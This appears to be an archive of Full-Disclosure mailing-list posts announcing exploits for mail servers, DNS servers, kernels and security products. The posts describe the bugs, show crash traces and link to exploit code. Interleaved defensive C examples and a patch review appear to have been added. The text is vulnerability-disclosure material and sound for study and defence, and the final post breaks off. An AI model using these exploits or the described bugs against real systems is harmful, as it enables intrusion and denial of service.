[Full-disclosure] Trusteer Rapport and anti-keylogging

2011-09-21 Thread mu-b
All - It has been a few weeks now since I demonstrated the following at
44con (http://www.44con.com) and thus time to just dump the details here.

The following are what can only be described as 'design flaws' in
Trusteer Rapport's anti-keylogger protections, that is Rapport provides
the functionality to decrypt keys to *everyone* along with the ability
to 'switch-off' anti-keylogger protections altogether. However, I
should say that in the latter case, Trusteer aren't the only ones to
provide such functionality, KeyScrambler does also.

This is somewhat documented in the following post,
http://www.digit-security.com/blog/?p=47

The following are for OSX *only*, but you can extend these to Windows
trivially (the ioctl obfuscation layer is easily bypassed by using
Trusteer's own code),

http://.digit-security.com/files/exploits/rapport-switchoff.c
- switches off anti-keylogger protections on OSX allowing your already
existing keylogger to function correctly once again.

http://.digit-security.com/files/exploits/rapport-listen.c
- uses Trusteer's own functionality to 'decrypt' keys directly.

-- 
mu-b
(m...@digit-labs.org)

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] NovaStor NovaNet <= 13.0 issues

2010-04-26 Thread mu-b
All - many of the following were inexplicably fixed in the latest
version (NovaBACKUP Network 13.0), but still, a 2.5 year run isn't too
bad...

http://digit-labs.org/files/exploits/novanet-own-lnx.c
- linux remote root <= 12.0

http://digit-labs.org/files/exploits/novanet-read.c
- arbitrary remote dword read <= 12.0

http://digit-labs.org/files/exploits/novanet-own.c
- Windows (no-DEP/NX, NovaNet 11.0) remote SYSTEM <= 12.0
  (messy, there is a cleaner version)

They seem to have missed the last one, so it still works on 13.0, but
sadly the most useless  :(

http://digit-labs.org/files/exploits/novanet-dos.c
- null deref remote DoS <= 13.0

--
mu-b
(m...@digit-labs.org)

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP



[Full-disclosure] un-SafeCentral

2010-01-15 Thread mu-b
All - well, it would seem that SafeCentral (www.safecentral.com) really
isn't all that safe! Of course it is 'safe', that is secure, under the
assumption that Authentium seem to behold that all malware coders are
obviously idiots.

Those that aren't idiots would not really find it all that hard to break..

http://www.digit-labs.org/files/otherstuff/unsafecentral/
--
mu-b
(m...@digit-labs.org)

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP



Re: [Full-disclosure] VMSA-2009-0013 VMware Fusion resolves two security issues

2009-10-02 Thread mu-b
All - the first bug is self-explanatory,

 # Kernel denial of service vulnerability
 An integer overflow vulnerability in the vmx86 kernel extension allows
 for a denial of service by an unprivileged user.

The vmx86 kext ioctl handler contains several integer overflows which
lead to kernel heap corruptions. These are probably not exploitable, and
I didn't try given the second bug,

http://www.digit-labs.org/files/exploits/vmware-pop.c

 # Kernel code execution vulnerability
 An ioctl vulnerability in the vmx86 kernel extension allows for
 executing arbitrary code in the kernel context by an unprivileged
 user.

The vmx86 kext ioctl handler permits an unprivileged userland program to
initialize several function pointers via the 0x802E564A ioctl code.
These function pointers are later used from several reachable locations
within the driver, one of which is called immediately after initialization.

http://www.digit-labs.org/files/exploits/vmware-fission.c

--
mu-b
(m...@digit-labs.org)

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP



Re: [Full-disclosure] FreeBSD/OS X kernel bug dump

2009-03-24 Thread mu-b
thanks to the person who bothered to let me know the links were *slightly*
wrong, that is what you get trying to stay awake to beat jet-lag...

Quoting m...@digit-labs.org:

 All - the following are the exploits from the recent demonstrations at

 Apple Mac OSX = 10.4.0 local kernel root


http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl-v2.c
http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl-v2.sh


 FreeBSD = 7.0 ktimer local kernel root
 (http://security.freebsd.org/advisories/FreeBSD-SA-09:06.ktimer.asc)

 http://www.digit-labs.org/files/exploits/bsd-ktimer.c

 other random stuff..

 http://www.digit-labs.org/files/exploits/xnu-macfsstat-leak.c
 http://www.digit-labs.org/files/exploits/xnu-profil-leak.c
 http://www.digit-labs.org/files/exploits/xnu-appletalk-zip.c

 all the above are old now, but still exist today...

 christer/mu-b
 --
 mu-b
 (m...@digit-labs.org)

Only a few people will follow the proof. Whoever does will
   spend the rest of his life convincing people it is correct.
  - Anonymous, P ?= NP





[Full-disclosure] FreeBSD/OS X kernel bug dump

2009-03-23 Thread mu-b
All - the following are the exploits from the recent demonstrations at

Apple Mac OSX = 10.4.0 local kernel root

http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl.c
http://www.digit-labs.org/files/exploits/xnu-hfs-fcntl.sh

FreeBSD = 7.0 ktimer local kernel root
(http://security.freebsd.org/advisories/FreeBSD-SA-09:06.ktimer.asc)

http://www.digit-labs.org/files/exploits/bsd-ktimer.c

other random stuff..

http://www.digit-labs.org/files/exploits/xnu-macfsstat-leak.c
http://www.digit-labs.org/files/exploits/xnu-profil-leak.c
http://www.digit-labs.org/files/exploits/xnu-appletalk-zip.c

all the above are old now, but still exist today...

christer/mu-b
--
mu-b
(m...@digit-labs.org)

   Only a few people will follow the proof. Whoever does will
  spend the rest of his life convincing people it is correct.
 - Anonymous, P ?= NP



[Full-disclosure] eXtremail(ly easy) remote roots

2007-10-15 Thread mu-b
The attached either exploit or demonstrate a rash of remotely
exploitable bugs in eXtremail <=2.1.1 which perhaps should be
renamed to the more apt name of eXtremely-rootable-mail...

of course, in the grand schema, these are more-or-less completely
useless!..

*) extremail-v3.pl demonstrates two vulnerabilities, the first
a denial of service caused by an integer underflow into the
length argument of a call to memmove(). This is caused due to
the author replacing every occurrence of %s with %%s (before
logging the resulting string to a file, perhaps the author is
still somewhat paranoid after the re-occurrence of older format
string vulnerabilities :-)) whilst forgetting to take
into account that the string actually gets longer by a single-byte
after each replace!. The second bug is rather interesting and is
either a failure in GCC points-to analysis or a consequence of
the author neglecting the possibility that a temporary pointer
to a heap buffer may have changed after a call to realloc
(ifReservaMasMem) and refreshing the pointer to the heap
buffer given as argument (which may have been free()'d).
(I would tend to believe the latter..)
This results in the overwriting of potentially free'd memory
with user-definable data (albeit very restricted).
PoC: http://www.digit-labs.org/files/exploits/extremail-v3.pl

*) extremail-v4.c - trivial remote stack-overflow in the admin
interface.
PoC: http://www.digit-labs.org/files/exploits/extremail-v4.c

*) extremail-v5.c - remote heap overflow in CRAM-MD5 authentication.
PoC: http://www.digit-labs.org/files/exploits/extremail-v5.c

*) extremail-v6.c - trivial remote stack-overflow in PLAIN
authentication.
PoC: http://www.digit-labs.org/files/exploits/extremail-v6.c

*) extremail-v7.c - THIS PAGE UNINTENTIONALLY LEFT BLANK
(I appear to have misplaced it, but given that eXtremail is
holier than the pope himself, I shouldn't think it would take
too long to fill.)

*) extremail-v8.pl demonstrates a remote heap overflow in the
recv()-loop whereby the author has mistakenly assumed that the
string length of all currently received data is at least equal to
the sum of all return values from each call to recv().
(trivial contradiction follows if we send() the first buffer
containing \x00). This causes an incorrect number of bytes to
be reallocated and a remote heap overflow in a call to memcpy().
PoC: http://www.digit-labs.org/files/exploits/extremail-v8.pl
--
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
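The first extremail-v3.pl bug above comes from escaping every '%' as "%%" without accounting for the string growing by one byte per replacement. The following is an added example, not code from the post or from eXtremail: a routine that computes the grown length first and refuses a destination that cannot hold it, with a constructed input (not eXtremail log data) to show the undersized case being rejected.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Number of bytes (excluding the NUL) that escape_percent() needs for `in`:
 * every '%' becomes "%%", so the output grows by one byte per '%'.
 * Computing this before copying is what keeps the copy in bounds. */
size_t escaped_len(const char *in)
{
    size_t n = 0;
    for (; *in; in++)
        n += (*in == '%') ? 2 : 1;
    return n;
}

/* Escape '%' as "%%" so `in` can be handed to a printf-style logger as a
 * format string without being interpreted. Returns 0 on success, -1 when
 * `out` (capacity outcap, NUL included) is too small for the grown string;
 * on failure nothing is written. */
int escape_percent(const char *in, char *out, size_t outcap)
{
    size_t need = escaped_len(in);
    if (outcap == 0 || need >= outcap)     /* need + 1 byte for the NUL */
        return -1;
    char *p = out;
    for (; *in; in++) {
        if (*in == '%')
            *p++ = '%';
        *p++ = *in;
    }
    *p = '\0';
    return 0;
}

/* Constructed demo input (hypothetical, not eXtremail data). */
static const char demo_in[] = "user %s logged %s";

/* A destination sized for the original string only, as code that forgets
 * the growth would allocate. Returns -1: the grown string does not fit. */
int demo_undersized(void)
{
    char out[sizeof demo_in];              /* 18 bytes: 17 chars + NUL */
    return escape_percent(demo_in, out, sizeof out);
}

/* A destination sized from escaped_len(). Returns the escaped length on
 * success (19 for demo_in), -1 on any failure. */
int demo_sized(void)
{
    size_t need = escaped_len(demo_in);
    char *out = malloc(need + 1);
    if (!out) return -1;
    int rc = escape_percent(demo_in, out, need + 1);
    int ok = (rc == 0) && strcmp(out, "user %%s logged %%s") == 0;
    free(out);
    return ok ? (int)need : -1;
}

int main(void)
{
    printf("need=%zu undersized=%d sized=%d\n",
           escaped_len(demo_in), demo_undersized(), demo_sized());
    return 0;
}
```

The length is computed over the same input the copy loop reads, so the two cannot disagree; a destination sized from the original length (the undersized case) is refused instead of overrun.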



[Full-disclosure] SafeNET High Assurance Remote/SoftRemote (IPSecDrv.sys) remote DoS

2007-06-08 Thread mu-b
Attached is POC for a remote DoS in IPSecDrv.sys shipped with
SafeNET High Assurance Remote and SoftRemote. The version
tested is 10.4.0.12.

The bug itself is due to SafeNET making a complete hash of IPv6
support for IPSec. The result of the code is a complete DoS of
the machine in Kernel mode whilst the driver proceeds to enter
an infinite loop (apparently looking for a suitable IPSec extension
header, which it will never find). The dodgy code can be found
at offset 0x1000BEB0 of IPSecDrv.sys (10.4.0.12).

The attached code will only work over local subnets, however
this is trivially remote with IPv6.

PoC: http://www.digit-labs.org/files/exploits/safenet-dos.c

hmmm, I wonder how SafeNET think they can charge for such a
half-baked, crufty, god-awful implementation
--
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
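The SafeNET bug above is a header-chain walk that never terminates when the IPsec header it expects is absent. As an added example (not code from the post and not derived from IPSecDrv.sys), here is how a bounded walk over IPv6 extension headers looks: each iteration either advances through a length-checked header or returns, and a hard cap on the number of headers guarantees termination on any input. Header numbers and layouts follow RFC 8200; the packets are constructed for the demo.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define IPV6_HDR_LEN 40
#define MAX_EXT_HDRS 8        /* hard cap on the chain walk: guarantees termination */

/* Extension headers laid out as next-header byte + length in 8-octet units:
 * hop-by-hop (0), routing (43), destination options (60). */
static int is_chained_ext(uint8_t nh)
{
    return nh == 0 || nh == 43 || nh == 60;
}

/* Walk the header chain of an IPv6 packet and return the byte offset of the
 * IPsec header (AH = 51 or ESP = 50), or -1 if there is none, the packet is
 * truncated, a header claims more bytes than are present, or the chain is
 * longer than MAX_EXT_HDRS. `off` grows on every iteration that does not
 * return, so the loop cannot spin forever on a crafted chain. */
long ipsec_header_offset(const uint8_t *pkt, size_t len)
{
    if (len < IPV6_HDR_LEN || (pkt[0] >> 4) != 6) return -1;
    uint8_t nh = pkt[6];                      /* Next Header of the base header */
    size_t off = IPV6_HDR_LEN;
    for (int i = 0; i < MAX_EXT_HDRS; i++) {
        if (nh == 50 || nh == 51) return (long)off;
        if (nh == 44) {                       /* fragment header: fixed 8 bytes */
            if (len - off < 8) return -1;
            nh = pkt[off]; off += 8; continue;
        }
        if (!is_chained_ext(nh)) return -1;   /* upper-layer protocol: no IPsec here */
        if (len - off < 2) return -1;         /* need next-header and length bytes */
        size_t hlen = ((size_t)pkt[off + 1] + 1) * 8;
        if (hlen > len - off) return -1;      /* header runs past the packet */
        nh = pkt[off]; off += hlen;
    }
    return -1;                                /* chain too long: give up, do not loop */
}

/* Constructed packet: base header, one hop-by-hop header, then AH at 48. */
long demo_hbh_then_ah(void)
{
    uint8_t p[60] = {0};
    p[0] = 0x60; p[6] = 0;                    /* version 6, next header = hop-by-hop */
    p[40] = 51;  p[41] = 0;                   /* hop-by-hop: next = AH, 8 bytes */
    p[48] = 6;   p[49] = 4;                   /* AH: next = TCP (payload not walked) */
    return ipsec_header_offset(p, sizeof p);  /* 48 */
}

/* Constructed chain of twenty hop-by-hop headers that never reaches IPsec. */
long demo_endless_chain(void)
{
    uint8_t p[40 + 8 * 20] = {0};
    p[0] = 0x60; p[6] = 0;
    for (size_t off = 40; off < sizeof p; off += 8) { p[off] = 0; p[off + 1] = 0; }
    return ipsec_header_offset(p, sizeof p);  /* -1 after MAX_EXT_HDRS iterations */
}

/* Base header announces an extension header that is not in the packet. */
long demo_truncated(void)
{
    uint8_t p[41] = {0};
    p[0] = 0x60; p[6] = 0;
    return ipsec_header_offset(p, sizeof p);  /* -1 */
}

int main(void)
{
    printf("ah=%ld endless=%ld truncated=%ld\n",
           demo_hbh_then_ah(), demo_endless_chain(), demo_truncated());
    return 0;
}
```

The cap and the per-header length check are independent defences: the length check stops reads past the buffer, the cap stops an arbitrarily long but well-formed chain from consuming the kernel's time.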



[Full-disclosure] mydns-1.1.0 remote heap overflow

2007-04-27 Thread mu-b
The attached PoC causes a remote heap smash in mydns 1.1.0, the bug is found
within the dynamic update code (update.c). Exploitation requires update privs
(which tends not to matter too much if you know an IP address with
privileges to do so), also allow-update = yes must be set in /etc/mydns.conf.
The attached patch also fixes a stack based off-by-one overflow in update.c.

Example :-
0xb7f27410 in __kernel_vsyscall
()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0805d0e2 in ?? ()
(gdb) x/i $eip
0x805d0e2 [EMAIL PROTECTED]:   rep movsb %ds:(%esi),%es:(%edi)

PoC: http://www.digit-labs.org/files/exploits/mydns-rr-smash.c
Patch: http://www.digit-labs.org/files/patches/mydns-update.c.diff
-- 
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP



[Full-disclosure] eXtremail-v9

2007-04-20 Thread mu-b
The attached POC exploits a trivial stack smash in the DNS parsing code
of eXtremail versions <= 2.1.1 (current). The POC attached is rather
trivial in that it simply answers queries with a suitable response
(to exhibit the overflow).

However, the problem is further compounded by the fact that eXtremail
neglects to even verify the validity of the transaction id in any
responses, and thus is trivially vulnerable to DNS spoofing attacks
(I am *pretty* sure a more *inventive* method of exploitation exists
to yield trivial remote root...).

Program received signal SIGSEGV, Segmentation fault.
0xdeadbeef in ?? ()
(gdb) bt
#0  0xdeadbeef in ?? ()
#1  0x3031002e in ?? ()
#2  0x3634 in ?? ()
#3  0x in ?? ()
(gdb)

POC: http://www.digit-labs.org/files/exploits/extremail-v9.c
-- 
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
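The post notes that eXtremail does not verify the transaction id of DNS responses. As an added example, not code from the post or from eXtremail, here is the check a resolver applies before trusting a reply: the 16-bit ID must match the outstanding query, the QR bit must be set, and the echoed question must be identical to the one sent. The packets are constructed for the demo. A 16-bit ID alone is a small search space, which is why source-port randomisation is the standard companion defence; this example covers only the check the post says was missing.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Returns 1 if `resp` is a reply to the query identified by want_id and the
 * wire-format question `question` (name + QTYPE + QCLASS, qlen bytes),
 * 0 otherwise. Never reads beyond rlen. */
int dns_response_matches(const uint8_t *resp, size_t rlen, uint16_t want_id,
                         const uint8_t *question, size_t qlen)
{
    if (rlen < 12 || rlen - 12 < qlen) return 0;       /* header + question present? */
    uint16_t id    = (uint16_t)((resp[0] << 8) | resp[1]);
    uint16_t flags = (uint16_t)((resp[2] << 8) | resp[3]);
    uint16_t qd    = (uint16_t)((resp[4] << 8) | resp[5]);
    if (id != want_id)     return 0;                   /* not our transaction */
    if (!(flags & 0x8000)) return 0;                   /* QR clear: a query, not a reply */
    if (qd != 1)           return 0;                   /* expect exactly our one question */
    return memcmp(resp + 12, question, qlen) == 0;     /* same name, type and class */
}

/* Constructed question: "www.example.com", QTYPE A (1), QCLASS IN (1). */
static const uint8_t demo_question[] = {
    3,'w','w','w', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0,
    0x00,0x01, 0x00,0x01
};

/* Constructed reply: ID 0x1234, flags 0x8180 (QR, RD, RA), one question,
 * one A record (192.0.2.1, TTL 3600) using a name pointer to offset 12. */
static const uint8_t demo_reply[] = {
    0x12,0x34, 0x81,0x80, 0x00,0x01, 0x00,0x01, 0x00,0x00, 0x00,0x00,
    3,'w','w','w', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0,
    0x00,0x01, 0x00,0x01,
    0xc0,0x0c, 0x00,0x01, 0x00,0x01, 0x00,0x00,0x0e,0x10, 0x00,0x04, 192,0,2,1
};

int demo_genuine(void)
{
    return dns_response_matches(demo_reply, sizeof demo_reply, 0x1234,
                                demo_question, sizeof demo_question);   /* 1 */
}

/* Same reply with a different ID: rejected, which is the check the post
 * says eXtremail lacks. */
int demo_wrong_id(void)
{
    uint8_t r[sizeof demo_reply];
    memcpy(r, demo_reply, sizeof r);
    r[0] = 0x56; r[1] = 0x78;
    return dns_response_matches(r, sizeof r, 0x1234, demo_question, sizeof demo_question);
}

/* Correct ID, but the echoed question names a different host. */
int demo_wrong_question(void)
{
    uint8_t r[sizeof demo_reply];
    memcpy(r, demo_reply, sizeof r);
    r[13] = 'x';                                       /* "xww.example.com" */
    return dns_response_matches(r, sizeof r, 0x1234, demo_question, sizeof demo_question);
}

/* A reply cut short inside the question section is rejected, not parsed. */
int demo_truncated(void)
{
    return dns_response_matches(demo_reply, 20, 0x1234, demo_question, sizeof demo_question);
}

int main(void)
{
    printf("genuine=%d wrong_id=%d wrong_q=%d truncated=%d\n", demo_genuine(),
           demo_wrong_id(), demo_wrong_question(), demo_truncated());
    return 0;
}
```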



Re: [Full-disclosure] dproxy - arbitrary code execution through stack buffer overflow vulnerability

2007-03-23 Thread mu-b
you might want to NULL terminate query_string while you're there

Alexander Klink wrote:
 
 ||| Security Advisory AKLINK-SA-2007-001 |||
 ||| CVE-2007-1465 (CVE candidate)|||
 

 dproxy - remotely exploitable buffer overflow
 

 Date released: 20.03.2007
 Date reported: 11.03.2007
 $Revision: 1.1 $

 by Alexander Klink
Cynops GmbH
[EMAIL PROTECTED]
https://www.cynops.de/advisories/CVE-2007-1465.txt
(S/MIME signed: https://www.cynops.de/advisories/CVE-2007-1465-signed.txt)

 https://www.klink.name/security/aklink-sa-2007-001-dproxy-bufferoverflow.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1465

 Vendor: Matthew Pratt (Open Source)
 Product: dproxy - a small caching DNS server
 Website: http://dproxy.sourceforge.net
 Vulnerability: buffer overflow
 Class: remote
 Status: unpatched (author is unresponsive)
 Severity: high (arbitrary command execution as root)
 Releases known to be affected: 0.1, 0.2, 0.3, 0.4, 0.5
 Releases known NOT to be affected: dproxy-nexgen

 +
 Overview:

 dproxy suffers from a typical buffer overflow condition, which allows
 an attacker to overwrite the stack.

 +
 Technical details:

 In dproxy.c, the UDP packet buffer, which can be up to 4096 bytes long
 is copied into a variable called query_string, which is at most 2048
 bytes. As this is done using strcpy, the stack can be overwritten
 which leads to arbitrary command execution.

 Note that one can easily find out whether dproxy is running
 using the fpdns tool (see http://www.rfc.se/fpdns/). dproxy also
 seems to be used in a number of WLAN access points / routers, but
 the version used there (at least in the Linksys WRT54AG, the Asus
 WL500g and the Netgear DG834G) seems to be dproxy-nexgen, which is not
 vulnerable to this attack.

 Thanks to Dan Kaminsky, who provided me with the interesting statistics
 that apparently only 20 out of about 2.000.000 DNS servers he scanned
 are using dproxy. So this does not look like a major attack vector.

 +
 Exploit:

 A MetaSploit Framework 2.7 exploit module is available from
 https://www.cynops.de/downloads/metasploit/dproxy.pm

 It has been tested successfully with both a Debian stable and an
 Ubuntu system (with randomize_va_space=0).

 +
 Workaround:

 Drop packets to the destination UDP port 53 which are larger than
 2048 bytes (which is a pretty large DNS query packet anyway).

 +
 Communication:

 * 13.03.2007: Author updated on vulnerable versions
 * 11.03.2007: First problem report to author

 +
 Solution:

 Patch dproxy.c:

 --- dproxy-0.5/dproxy.c 2000-02-03 04:15:35.0 +0100
 +++ dproxy-0.5.patched/dproxy.c 2007-03-13 13:07:53.0 +0100
 @@ -105,7 +105,7 @@
/* child process only here */
signal(SIGCHLD, SIG_IGN);

 -  strcpy( query_string, pkt.buf );
 +  strncpy( query_string, pkt.buf, sizeof(query_string) );
decode_domain_name( query_string );
debug(query: %s\n, query_string );
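Review bot: the replacement strncpy(query_string, pkt.buf, sizeof(query_string)) stops the stack overwrite but does not NUL-terminate query_string whenever pkt.buf holds sizeof(query_string) or more bytes, so the decode_domain_name(query_string) and debug("query: %s\n", query_string) that follow read past the end of the array. Copy at most sizeof(query_string)-1 bytes and set query_string[sizeof(query_string)-1] = '\0', or reject packets longer than the buffer before the copy, which is what the advisory's own workaround (dropping UDP/53 packets above 2048 bytes) already does at the network layer.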

 +
 Credits:

 Alexander Klink, Cynops GmbH (discovery and exploit development, patch)

-- 
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
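mu-b's one-line reply is the whole point of the patch review: a bounded copy is only half a fix if the destination can be left unterminated. The following is an added example, not code from the advisory, from dproxy or from mu-b: it shows strncpy leaving the buffer without a NUL on oversized input, beside a copy that bounds the scan by the packet length, rejects input that cannot fit with its terminator, and always terminates. The buffer sizes are the 4096 and 2048 stated in the advisory; the inputs are constructed for the demo.

```c
#define _POSIX_C_SOURCE 200809L   /* strnlen */
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define QUERY_MAX 2048   /* size of query_string in dproxy.c, per the advisory */
#define PKT_MAX   4096   /* size of the UDP packet buffer, per the advisory */

/* strncpy(dst, src, dstlen) writes no terminator when src holds dstlen or
 * more bytes before its NUL. Returns 1 if dst ends up NUL-terminated, 0 if
 * a later string function on dst would read past its end. */
int strncpy_terminates(const char *src, char *dst, size_t dstlen)
{
    strncpy(dst, src, dstlen);
    return memchr(dst, '\0', dstlen) != NULL;
}

/* Hardened copy: the scan for the string's end is bounded by the packet
 * length, oversized input is rejected rather than silently truncated, and
 * dst is always NUL-terminated. Returns 0 on success, -1 on rejection. */
int copy_query_checked(char *dst, size_t dstlen, const char *pkt, size_t pktlen)
{
    if (dstlen == 0) return -1;
    size_t n = strnlen(pkt, pktlen);         /* never scans beyond the packet */
    if (n >= dstlen) {                       /* no room for n bytes plus the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, pkt, n);
    dst[n] = '\0';
    return 0;
}

/* Constructed 3000-byte "query" (not real dproxy traffic): longer than
 * query_string, shorter than the packet buffer. */
static void fill_oversized(char *pkt)
{
    memset(pkt, 'A', 3000);
    pkt[3000] = '\0';
}

int scenario_oversized_checked(void)     /* -1: rejected */
{
    char pkt[PKT_MAX], q[QUERY_MAX];
    fill_oversized(pkt);
    return copy_query_checked(q, sizeof q, pkt, sizeof pkt);
}

int scenario_oversized_strncpy(void)     /* 0: q left without a terminator */
{
    char pkt[PKT_MAX], q[QUERY_MAX];
    fill_oversized(pkt);
    return strncpy_terminates(pkt, q, sizeof q);
}

int scenario_normal(void)                /* 1: a normal query copied intact */
{
    /* wire-format name "www.example.com"; the split literals stop \x07 from
     * swallowing the following 'e' as a hex digit */
    const char pkt[] = "\x03" "www" "\x07" "example" "\x03" "com";
    char q[QUERY_MAX];
    return copy_query_checked(q, sizeof q, pkt, sizeof pkt) == 0 && strcmp(q, pkt) == 0;
}

int main(void)
{
    printf("checked=%d strncpy_terminated=%d normal=%d\n",
           scenario_oversized_checked(), scenario_oversized_strncpy(), scenario_normal());
    return 0;
}
```

Rejecting rather than truncating matters for DNS in particular: a silently truncated name is still passed to decode_domain_name() and resolved as something the client never asked for.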



[Full-disclosure] Mercur SP4 IMAPD

2007-03-20 Thread mu-b
The attached exploits several signedness bugs in the NTLM implementation
of Mercur IMAPD (www.atrium-software.com) to give the attacker
complete control over a memcpy to a stack variable... (non-authenticated)
In this case, memcpy(buf, src+a, b) with 'a', and 'b' being user controlled
and buf ~7208 bytes.

note due to the most important signedness issue, we can only control 'a' within
the range -65535 < a < 65536...

The result of the PoC is a simple crash trying to copy 0x bytes...

(d94.1dc): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0210a108 ebx=0210ac24 ecx=3fffeb08 edx= esi=0211 edi=0210f4e4
eip=0042e0d3 esp=021098c8 ebp=021098d0 iopl=0 nv up ei pl nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010207
*** WARNING: Unable to verify checksum for C:\Program Files\MERCUR\mcrimap4.exe
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
C:\Program Files\MERCUR\mcrimap4.exe -
mcrimap4!_GetExceptDLLinfo+0x2d05f:
0042e0d3 f3a5rep movs dword ptr es:[edi],dword ptr [esi] 
es:0023:0210f4e4= ds:0023:0211=???

PoC: http://www.digit-labs.org/files/exploits/mercur-v1.pl
-- 
mu-b
([EMAIL PROTECTED])

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP
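The Mercur bug above, and the MailEnable NTLM_UnPack_Type3 out-of-bounds read posted later in this thread, are the same class: offset and length fields read from an NTLM message and used in a memcpy without being checked against the message and destination sizes as unsigned quantities. The following is an added example, not code from either post or either product: a signed check of the kind described, shown accepting a negative offset, beside an unsigned check ordered so it cannot overflow. The security-buffer layout (16-bit length, 16-bit allocated length, 32-bit offset) is the NTLM message format; the messages are constructed for the demo.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* NTLM "security buffer" descriptor as carried in Type 3 messages. */
struct ntlm_secbuf {
    uint16_t len;
    uint16_t maxlen;
    uint32_t offset;
};

/* The class of check the posts describe as broken: offset and length held
 * as signed ints, so a negative value passes `a + b < size` and the later
 * memcpy(buf, src + a, b) reads before `src`. Returns 1 if accepted. */
int flawed_accepts(int a, int b, int size)
{
    return a + b < size;
}

/* Hardened check: unsigned arithmetic ordered so it cannot overflow, and
 * the destination capacity included. Returns 0 if msg[offset, offset+len)
 * lies inside the message and fits dst, -1 otherwise. */
int secbuf_check(const struct ntlm_secbuf *sb, size_t msglen, size_t dstcap)
{
    if (sb->offset > msglen)                   return -1;  /* starts past the end */
    if ((size_t)sb->len > msglen - sb->offset) return -1;  /* runs past the end */
    if ((size_t)sb->len > dstcap)              return -1;  /* would overflow dst */
    return 0;
}

/* Decode a security buffer from its 8 little-endian bytes at p. */
struct ntlm_secbuf secbuf_read(const uint8_t *p)
{
    struct ntlm_secbuf sb;
    sb.len    = (uint16_t)(p[0] | (p[1] << 8));
    sb.maxlen = (uint16_t)(p[2] | (p[3] << 8));
    sb.offset = (uint32_t)p[4] | ((uint32_t)p[5] << 8) |
                ((uint32_t)p[6] << 16) | ((uint32_t)p[7] << 24);
    return sb;
}

/* Copy the referenced bytes into dst only after secbuf_check() passes.
 * Returns the number of bytes copied, or -1. */
long secbuf_copy(uint8_t *dst, size_t dstcap, const uint8_t *msg, size_t msglen,
                 const struct ntlm_secbuf *sb)
{
    if (secbuf_check(sb, msglen, dstcap) != 0) return -1;
    memcpy(dst, msg + sb->offset, sb->len);
    return (long)sb->len;
}

/* Constructed 32-byte message (hypothetical, not a real NTLM Type 3): one
 * security-buffer descriptor at offset 20 and 4 payload bytes at offset 28. */
static uint8_t demo_msg[32];

static void demo_build(uint16_t len, uint32_t off)
{
    memset(demo_msg, 0, sizeof demo_msg);
    demo_msg[20] = (uint8_t)len;         demo_msg[21] = (uint8_t)(len >> 8);
    demo_msg[22] = (uint8_t)len;         demo_msg[23] = (uint8_t)(len >> 8);  /* maxlen = len */
    demo_msg[24] = (uint8_t)off;         demo_msg[25] = (uint8_t)(off >> 8);
    demo_msg[26] = (uint8_t)(off >> 16); demo_msg[27] = (uint8_t)(off >> 24);
    memcpy(demo_msg + 28, "NTLM", 4);
}

static long demo_run(uint16_t len, uint32_t off, size_t dstcap)
{
    uint8_t dst[16];
    demo_build(len, off);
    struct ntlm_secbuf sb = secbuf_read(demo_msg + 20);
    return secbuf_copy(dst, dstcap, demo_msg, sizeof demo_msg, &sb);
}

long demo_valid(void)           { return demo_run(4, 28, 16); }           /* 4 */
long demo_negative_offset(void) { return demo_run(4, 0xffff15a0u, 16); }  /* -1: -60000 as int32 */
long demo_len_past_end(void)    { return demo_run(8, 28, 16); }           /* -1: 28 + 8 > 32 */
long demo_dst_too_small(void)   { return demo_run(4, 28, 2); }            /* -1 */

int main(void)
{
    printf("flawed check accepts a=-60000,b=4: %d\n", flawed_accepts(-60000, 4, 7208));
    printf("valid=%ld negative=%ld past_end=%ld small_dst=%ld\n", demo_valid(),
           demo_negative_offset(), demo_len_past_end(), demo_dst_too_small());
    return 0;
}
```

The same 0xffff15a0 that the signed check reads as -60000 is simply larger than the message to the unsigned check, which is why comparing `offset > msglen` before `len > msglen - offset` is both overflow-free and sufficient.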



[Full-disclosure] Mercury/32 4.01b

2007-03-06 Thread mu-b
Attached is a remote exploit (disarmed PoC) for Mercury/32 4.01b IMAPD.
The vulnerability is located in the call:-
034646AE call sub_346ECD9
which passes (as third argument) the number of bytes remaining in a
stack buffer in order to construct the complete command from the
